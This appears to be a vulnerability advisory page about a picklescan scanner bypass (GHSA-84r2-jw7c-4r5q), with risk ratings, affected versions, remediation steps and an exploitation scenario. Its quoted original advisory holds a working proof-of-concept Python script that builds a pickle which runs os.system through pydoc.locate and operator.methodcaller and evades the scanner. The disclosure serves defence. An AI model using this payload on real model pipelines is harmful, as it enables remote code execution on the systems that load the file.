AI Threat Alert
If your ML pipelines use picklescan as a security gate for model files, that control is bypassed — attackers can craft pickle payloads that picklescan rates as Safe or Suspicious instead of Dangerous, achieving RCE on load. Patch to picklescan 0.0.33 immediately and treat any model file scanned by a prior version as unverified. This is a scanner bypass, not a model vulnerability — your security posture has a blind spot right now.
What is the risk?
HIGH. The PoC is public, trivial to execute with standard Python libraries, and targets a security control that organizations deliberately deploy to prevent RCE from malicious model files. The combination of bypassing a safety scanner plus achieving code execution is particularly dangerous because it creates a false sense of security — teams believe they are protected when they are not. Exposure is broad: any organization using picklescan in CI/CD, MLOps pipelines, or data science workflows to validate model files downloaded from external sources.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.33 | 0.0.33 |
Do you use picklescan? You're affected.
How severe is it?
What should I do?
1 step-
1) Upgrade picklescan to v0.0.33 immediately — this is the only complete fix. 2) Audit all pickle files scanned with versions < 0.0.33 in the past 90 days; treat them as potentially unsafe and re-scan. 3) Implement defense-in-depth: load models in sandboxed/isolated environments (Docker, VM, restricted subprocess) regardless of scan results. 4) Migrate to SafeTensors format for model distribution — eliminates pickle deserialization risk entirely. 5) Enforce model provenance: cryptographic hash verification and signed artifact attestation as a secondary control layer. 6) Detection in SIEM: alert on picklescan logs showing 'Suspicious' results for pydoc or operator modules — under prior versions these were under-flagged RCE payloads.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-84r2-jw7c-4r5q?
If your ML pipelines use picklescan as a security gate for model files, that control is bypassed — attackers can craft pickle payloads that picklescan rates as Safe or Suspicious instead of Dangerous, achieving RCE on load. Patch to picklescan 0.0.33 immediately and treat any model file scanned by a prior version as unverified. This is a scanner bypass, not a model vulnerability — your security posture has a blind spot right now.
Is GHSA-84r2-jw7c-4r5q actively exploited?
No confirmed active exploitation of GHSA-84r2-jw7c-4r5q has been reported, but organizations should still patch proactively.
How to fix GHSA-84r2-jw7c-4r5q?
1) Upgrade picklescan to v0.0.33 immediately — this is the only complete fix. 2) Audit all pickle files scanned with versions < 0.0.33 in the past 90 days; treat them as potentially unsafe and re-scan. 3) Implement defense-in-depth: load models in sandboxed/isolated environments (Docker, VM, restricted subprocess) regardless of scan results. 4) Migrate to SafeTensors format for model distribution — eliminates pickle deserialization risk entirely. 5) Enforce model provenance: cryptographic hash verification and signed artifact attestation as a secondary control layer. 6) Detection in SIEM: alert on picklescan logs showing 'Suspicious' results for pydoc or operator modules — under prior versions these were under-flagged RCE payloads.
What systems are affected by GHSA-84r2-jw7c-4r5q?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD, model registries.
What is the CVSS score for GHSA-84r2-jw7c-4r5q?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0011.000 Unsafe AI Artifacts AML.T0018.002 Embed Malware AML.T0074 Masquerading AML.T0107 Exploitation for Defense Evasion Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly * pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module). * operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system. Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check. ### PoC use the provided script to create a malicious pickle file ```python import pickle import pydoc import operator import os class ModuleLocator: def __init__(self, module_name): self.module_name = module_name def __reduce__(self): return (pydoc.locate, (self.module_name,)) class RCEPayload: def __reduce__(self): cmd = "notepad" #put your payload here mc = operator.methodcaller("system", cmd) return (mc, (ModuleLocator("os"),)) def generate_exploit(): payload = RCEPayload() try: with open("bypass.pkl", "wb") as f: f.write(pickle.dumps(payload)) print("File 'bypass.pkl' created.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": generate_exploit() ``` The generated payload will not be flagged as dangerous by picklescan but is actually malicious. ```python import pickle print("Loading bypass.pkl...") pickle.load(open("bypass.pkl", "rb")) ``` Script to open the pickle file, demonstrating impact <img width="746" height="341" alt="image" src="https://github.com/user-attachments/assets/2be1b8f9-d467-408d-b1cf-d40b49100cf0" /> ### Remediation The deny-list for these modules must be upgraded from specific functions to a wildcard (*), indicating that any use of these modules is dangerous.
Exploitation Scenario
Attacker targets an organization with an automated MLOps pipeline that pulls pre-trained models from a public registry and scans them with picklescan before loading. The attacker publishes a malicious model to Hugging Face or injects into an internal registry, embedding a pydoc.locate + operator.methodcaller payload that resolves os.system and executes a reverse shell. picklescan v< 0.0.33 rates the file as Safe. The CI/CD pipeline loads the model into the training cluster. The attacker now has RCE on GPU infrastructure with access to proprietary model weights, training data, and the ability to inject backdoors into production models before they are deployed.
Weaknesses (CWE)
CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
- [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
CVE-2026-3490 10.0 picklescan: blocklist bypass enables full RCE
Same package: picklescan GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same package: picklescan GHSA-g38g-8gr9-h9xp 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan CVE-2025-1945 9.8 picklescan: ZIP flag bypass enables RCE in PyTorch models
Same package: picklescan GHSA-7wx9-6375-f5wh 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan